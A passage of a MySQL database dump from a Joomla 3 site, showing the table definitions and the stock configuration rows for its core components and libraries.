  KEY `idx_date_id` (`tag_date`,`tag_id`),
  KEY `idx_core_content_id` (`core_content_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Maps items from content tables to tags';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_contentitem_tag_map`
--

LOCK TABLES `fw3gt_contentitem_tag_map` WRITE;
/*!40000 ALTER TABLE `fw3gt_contentitem_tag_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_contentitem_tag_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_core_log_searches`
--

DROP TABLE IF EXISTS `fw3gt_core_log_searches`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_core_log_searches` (
  `search_term` varchar(128) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `hits` int(10) unsigned NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_core_log_searches`
--

LOCK TABLES `fw3gt_core_log_searches` WRITE;
/*!40000 ALTER TABLE `fw3gt_core_log_searches` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_core_log_searches` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_extensions`
--

DROP TABLE IF EXISTS `fw3gt_extensions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_extensions` (
  `extension_id` int(11) NOT NULL AUTO_INCREMENT,
  `package_id` int(11) NOT NULL DEFAULT '0' COMMENT 'Parent package ID for extensions installed as a package.',
  `name` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `element` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `folder` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_id` tinyint(3) NOT NULL,
  `enabled` tinyint(3) NOT NULL DEFAULT '0',
  `access` int(10) unsigned NOT NULL DEFAULT '1',
  `protected` tinyint(3) NOT NULL DEFAULT '0',
  `manifest_cache` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `custom_data` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `system_data` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) DEFAULT '0',
  `state` int(11) DEFAULT '0',
  PRIMARY KEY (`extension_id`),
  KEY `element_clientid` (`element`,`client_id`),
  KEY `element_folder_clientid` (`element`,`folder`,`client_id`),
  KEY `extension` (`type`,`element`,`folder`,`client_id`)
) ENGINE=InnoDB AUTO_INCREMENT=10436 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_extensions`
--

LOCK TABLES `fw3gt_extensions` WRITE;
/*!40000 ALTER TABLE `fw3gt_extensions` DISABLE KEYS */;
INSERT INTO `fw3gt_extensions` VALUES (1,0,'com_mailto','component','com_mailto','',0,1,1,1,'{\"name\":\"com_mailto\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MAILTO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mailto\"}','','','',0,'0000-00-00 00:00:00',0,0),(2,0,'com_wrapper','component','com_wrapper','',0,1,1,1,'{\"name\":\"com_wrapper\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"wrapper\"}','','','',0,'0000-00-00 00:00:00',0,0),(3,0,'com_admin','component','com_admin','',1,1,1,1,'{\"name\":\"com_admin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_ADMIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(4,0,'com_banners','component','com_banners','',1,1,1,0,'{\"name\":\"com_banners\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"banners\"}','{\"purchase_type\":\"3\",\"track_impressions\":\"0\",\"track_clicks\":\"0\",\"metakey_prefix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(5,0,'com_cache','component','com_cache','',1,1,1,1,'{\"name\":\"com_cache\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(6,0,'com_categories','component','com_categories','',1,1,1,1,'{\"name\":\"com_categories\",\"type\":\"component\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(7,0,'com_checkin','component','com_checkin','',1,1,1,1,'{\"name\":\"com_checkin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CHECKIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(8,0,'com_contact','component','com_contact','',1,1,1,0,'{\"name\":\"com_contact\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{\"show_contact_category\":\"hide\",\"show_contact_list\":\"0\",\"presentation_style\":\"sliders\",\"show_name\":\"1\",\"show_position\":\"1\",\"show_email\":\"0\",\"show_street_address\":\"1\",\"show_suburb\":\"1\",\"show_state\":\"1\",\"show_postcode\":\"1\",\"show_country\":\"1\",\"show_telephone\":\"1\",\"show_mobile\":\"1\",\"show_fax\":\"1\",\"show_webpage\":\"1\",\"show_misc\":\"1\",\"show_image\":\"1\",\"image\":\"\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"contact_icons\":\"0\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"show_headings\":\"1\",\"show_position_headings\":\"1\",\"show_email_headings\":\"0\",\"show_telephone_headings\":\"1\",\"show_mobile_headings\":\"0\",\"show_fax_headings\":\"0\",\"allow_vcard_headings\":\"0\",\"show_suburb_headings\":\"1\",\"show_state_headings\":\"1\",\"show_country_headings\":\"1\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"0\",\"redirect\":\"\",\"show_category_crumb\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(9,0,'com_cpanel','component','com_cpanel','',1,1,1,1,'{\"name\":\"com_cpanel\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CPANEL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10,0,'com_installer','component','com_installer','',1,1,1,1,'{\"name\":\"com_installer\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_INSTALLER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(11,0,'com_languages','component','com_languages','',1,1,1,1,'{\"name\":\"com_languages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','{\"administrator\":\"ru-RU\",\"site\":\"uk-UA\"}','','',0,'0000-00-00 00:00:00',0,0),(12,0,'com_login','component','com_login','',1,1,1,1,'{\"name\":\"com_login\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(13,0,'com_media','component','com_media','',1,1,0,1,'{\"name\":\"com_media\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MEDIA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"media\"}','{\"upload_extensions\":\"bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\",\"upload_maxsize\":\"10\",\"file_path\":\"images\\/stories\",\"image_path\":\"images\\/stories\",\"restrict_uploads\":\"1\",\"check_mime\":\"1\",\"image_extensions\":\"bmp,gif,jpg,png\",\"ignore_extensions\":\"\",\"upload_mime\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip\",\"upload_mime_illegal\":\"text\\/html\"}','','',0,'0000-00-00 00:00:00',0,0),(14,0,'com_menus','component','com_menus','',1,1,1,1,'{\"name\":\"com_menus\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MENUS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(15,0,'com_messages','component','com_messages','',1,1,1,1,'{\"name\":\"com_messages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MESSAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(16,0,'com_modules','component','com_modules','',1,1,1,1,'{\"name\":\"com_modules\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MODULES_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(17,0,'com_newsfeeds','component','com_newsfeeds','',1,1,1,0,'{\"name\":\"com_newsfeeds\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{\"show_feed_image\":\"1\",\"show_feed_description\":\"1\",\"show_item_description\":\"1\",\"feed_word_count\":\"0\",\"show_headings\":\"1\",\"show_name\":\"1\",\"show_articles\":\"0\",\"show_link\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"display_num\":\"\",\"show_pagination_limit\":\"1\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\",\"show_cat_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(18,0,'com_plugins','component','com_plugins','',1,1,1,1,'{\"name\":\"com_plugins\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_PLUGINS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(19,0,'com_search','component','com_search','',1,1,1,0,'{\"name\":\"com_search\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"search\"}','{\"enabled\":\"0\",\"show_date\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(20,0,'com_templates','component','com_templates','',1,1,1,1,'{\"name\":\"com_templates\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_TEMPLATES_XML_DESCRIPTION\",\"group\":\"\"}','{\"template_positions_display\":\"1\",\"upload_limit\":\"2\",\"image_formats\":\"gif,bmp,jpg,jpeg,png\",\"source_formats\":\"txt,less,ini,xml,js,php,css\",\"font_formats\":\"woff,ttf,otf\",\"compressed_formats\":\"zip\"}','','',0,'0000-00-00 00:00:00',0,0),(21,801,'com_weblinks','component','com_weblinks','',1,1,1,0,'{\"name\":\"com_weblinks\",\"type\":\"component\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"weblinks\"}','{\"show_comp_description\":\"1\",\"comp_description\":\"\",\"show_link_hits\":\"1\",\"show_link_description\":\"1\",\"show_other_cats\":\"0\",\"show_headings\":\"0\",\"show_numbers\":\"0\",\"show_report\":\"1\",\"count_clicks\":\"1\",\"target\":\"0\",\"link_icons\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(22,0,'com_content','component','com_content','',1,1,0,1,'{\"name\":\"com_content\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{\"article_layout\":\"_:default\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"info_block_position\":\"0\",\"info_block_show_title\":\"1\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_parent_category\":\"1\",\"link_parent_category\":\"0\",\"show_associations\":\"0\",\"flags\":\"1\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"1\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_readmore\":\"1\",\"show_readmore_title\":\"1\",\"readmore_limit\":\"80\",\"show_tags\":\"1\",\"show_icons\":\"1\",\"show_print_icon\":\"1\",\"show_email_icon\":\"0\",\"show_hits\":\"1\",\"show_noauth\":\"1\",\"urls_position\":\"0\",\"captcha\":\"0\",\"show_publishing_options\":\"1\",\"show_article_options\":\"1\",\"save_history\":\"0\",\"history_limit\":10,\"show_urls_images_frontend\":\"0\",\"show_urls_images_backend\":\"1\",\"targeta\":0,\"targetb\":0,\"targetc\":0,\"float_intro\":\"left\",\"float_fulltext\":\"left\",\"category_layout\":\"_:blog\",\"show_category_heading_title_text\":\"1\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"1\",\"show_empty_categories\":\"0\",\"show_no_articles\":\"1\",\"show_subcat_desc\":\"1\",\"show_cat_num_articles\":\"0\",\"show_cat_tags\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_num_articles_cat\":\"1\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"6\",\"num_columns\":\"1\",\"num_links\":\"0\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"0\",\"show_pagination_limit\":\"1\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"1\",\"list_show_author\":\"0\",\"list_show_votes\":\"0\",\"list_show_ratings\":\"0\",\"orderby_pri\":\"order\",\"orderby_sec\":\"rdate\",\"order_date\":\"published\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\",\"show_featured\":\"show\",\"show_feed_link\":\"1\",\"feed_summary\":\"0\",\"feed_show_readmore\":\"1\",\"sef_advanced\":0,\"sef_ids\":0,\"custom_fields_enable\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(23,0,'com_config','component','com_config','',1,1,0,1,'{\"name\":\"com_config\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONFIG_XML_DESCRIPTION\",\"group\":\"\"}','{\"filters\":{\"1\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"6\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"7\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"2\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"3\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"4\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"5\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"8\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"}}}','','',0,'0000-00-00 00:00:00',0,0),(24,0,'com_redirect','component','com_redirect','',1,1,0,1,'{\"name\":\"com_redirect\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(25,0,'com_users','component','com_users','',1,1,0,1,'{\"name\":\"com_users\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_USERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"users\"}','{\"allowUserRegistration\":\"0\",\"new_usertype\":\"2\",\"guest_usergroup\":\"1\",\"sendpassword\":\"1\",\"useractivation\":\"2\",\"mail_to_admin\":\"1\",\"captcha\":\"\",\"frontend_userparams\":\"1\",\"site_language\":\"0\",\"change_login_name\":\"0\",\"reset_count\":\"10\",\"reset_time\":\"1\",\"mailSubjectPrefix\":\"\",\"mailBodySuffix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(27,0,'com_finder','component','com_finder','',1,1,0,0,'{\"name\":\"com_finder\",\"type\":\"component\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"finder\"}','{\"show_description\":\"1\",\"description_length\":255,\"allow_empty_query\":\"0\",\"show_url\":\"1\",\"show_advanced\":\"1\",\"expand_advanced\":\"0\",\"show_date_filters\":\"0\",\"highlight_terms\":\"1\",\"opensearch_name\":\"\",\"opensearch_description\":\"\",\"batch_size\":\"50\",\"memory_table_limit\":30000,\"title_multiplier\":\"1.7\",\"text_multiplier\":\"0.7\",\"meta_multiplier\":\"1.2\",\"path_multiplier\":\"2.0\",\"misc_multiplier\":\"0.3\",\"stemmer\":\"snowball\"}','','',0,'0000-00-00 00:00:00',0,0),(28,0,'com_joomlaupdate','component','com_joomlaupdate','',1,1,0,1,'{\"name\":\"com_joomlaupdate\",\"type\":\"component\",\"creationDate\":\"February 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.2\",\"description\":\"COM_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{\"updatesource\":\"sts\",\"customurl\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(29,0,'com_tags','component','com_tags','',1,1,1,1,'{\"name\":\"com_tags\",\"type\":\"component\",\"creationDate\":\"December 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"COM_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(30,0,'com_contenthistory','component','com_contenthistory','',1,1,1,0,'{\"name\":\"com_contenthistory\",\"type\":\"component\",\"creationDate\":\"May 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_CONTENTHISTORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contenthistory\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(31,0,'com_ajax','component','com_ajax','',1,1,1,1,'{\"name\":\"com_ajax\",\"type\":\"component\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_AJAX_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ajax\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(32,0,'com_postinstall','component','com_postinstall','',1,1,1,1,'{\"name\":\"com_postinstall\",\"type\":\"component\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_POSTINSTALL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(33,0,'com_fields','component','com_fields','',1,1,1,0,'{\"name\":\"com_fields\",\"type\":\"component\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"COM_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',0,0),(34,0,'com_associations','component','com_associations','',1,1,1,0,'{\"name\":\"com_associations\",\"type\":\"component\",\"creationDate\":\"January 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"COM_ASSOCIATIONS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(35,0,'com_privacy','component','com_privacy','',1,1,1,1,'{\"name\":\"com_privacy\",\"type\":\"component\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_PRIVACY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacy\"}','','','',0,'0000-00-00 00:00:00',0,0),(36,0,'com_actionlogs','component','com_actionlogs','',1,1,1,1,'{\"name\":\"com_actionlogs\",\"type\":\"component\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\"}','{\"ip_logging\":0,\"csv_delimiter\":\",\",\"loggable_extensions\":[\"com_banners\",\"com_cache\",\"com_categories\",\"com_checkin\",\"com_config\",\"com_contact\",\"com_content\",\"com_installer\",\"com_media\",\"com_menus\",\"com_messages\",\"com_modules\",\"com_newsfeeds\",\"com_plugins\",\"com_redirect\",\"com_tags\",\"com_templates\",\"com_users\"]}','','',0,'0000-00-00 00:00:00',0,0),(102,0,'LIB_PHPUTF8','library','phputf8','',0,1,1,1,'{\"name\":\"LIB_PHPUTF8\",\"type\":\"library\",\"creationDate\":\"2006\",\"author\":\"Harry Fuecks\",\"copyright\":\"Copyright various authors\",\"authorEmail\":\"hfuecks@gmail.com\",\"authorUrl\":\"http:\\/\\/sourceforge.net\\/projects\\/phputf8\",\"version\":\"0.5\",\"description\":\"LIB_PHPUTF8_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phputf8\"}','','','',0,'0000-00-00 00:00:00',0,0),(103,0,'LIB_JOOMLA','library','joomla','',0,1,1,1,'{\"name\":\"LIB_JOOMLA\",\"type\":\"library\",\"creationDate\":\"2008\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights 